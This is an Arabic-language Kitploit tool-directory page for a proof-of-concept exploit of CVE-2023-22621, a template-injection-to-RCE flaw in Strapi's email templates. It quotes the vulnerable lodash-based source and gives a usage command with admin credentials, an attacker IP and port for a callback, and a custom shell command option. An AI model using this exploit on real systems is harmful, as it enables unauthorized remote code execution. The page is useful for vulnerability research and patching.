Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-22621-POC — CVE-2023-22621: SSTI إلى RCE عبر استغلال قوالب البريد الإلكتروني التي تؤثر على إصدارات Strapi <=4.5.5 | Kitploit
أدوات/GitHubGitHub/sofianeelhor/cve-2023-22621-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubsofianeelhor/cve-2023-22621-poc

CVE-2023-22621-POC

CVE-2023-22621: SSTI إلى RCE عبر استغلال قوالب البريد الإلكتروني التي تؤثر على إصدارات Strapi <=4.5.5

عرض المستودع
255منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-22621-POC

CVE-2023-22621: SSTI إلى RCE عبر استغلال قوالب البريد الإلكتروني التي تؤثر على إصدارات Strapi <=4.5.5

تقوم الدالة sendTemplatedEmail بعرض قوالب البريد الإلكتروني إلى محتوى HTML باستخدام lodash محرك القوالب الذي يقيّم كود JavaScript داخل القوالب. المرجع: https://twitter.com/rootxharsh/status/1268181937127997446?lang=en

root@kitploit:~
'use strict';

const _ = require('lodash');

const getProviderSettings = () => {
 return strapi.config.get('plugin.email');
};

const send = async (options) => {
 return strapi.plugin('email').provider.send(options);
};

/**
* fill subject, text and html using lodash template
* @param {object} emailOptions - to, from and replyto...
* @param {object} emailTemplate - object containing attributes to fill
* @param {object} data - data used to fill the template
* @returns {{ subject, text, subject }}
*/
const sendTemplatedEmail = (emailOptions = {}, emailTemplate = {}, data = {}) => {
 const attributes = ['subject', 'text', 'html'];
 const missingAttributes = _.difference(attributes, Object.keys(emailTemplate));
 if (missingAttributes.length > 0) {
   throw new Error(
     `Following attributes are missing from your email template : ${missingAttributes.join(', ')}`
   );
 }

POC

الاستخدام

python3 CVE-2023-22621.py -url http://strapi.local:1337/ -u "[email protected]" -p "$Securep4ss" -ip 127.0.0.1 -port 4545

root@kitploit:~
الخيارات:
  -h, --help            إظهار رسالة المساعدة هذه والخروج
  -url URL              عنوان URL الخاص بمثيل Strapi
  -u U                  اسم مستخدم المسؤول
  -p P                  كلمة مرور المسؤول
  -ip IP                عنوان IP للمهاجم
  -port PORT            منفذ المهاجم
  -url_redirect         عنوان URL لإعادة التوجيه بعد تأكيد البريد الإلكتروني
  -custom CUSTOM        أمر شل مخصص للتنفيذ

الاعتمادات

جميع الاعتمادات تعود إلى مكتشف الثغرة الأصلية، اطّلع على مقالته الرائعة هنا

تنزيل الأداة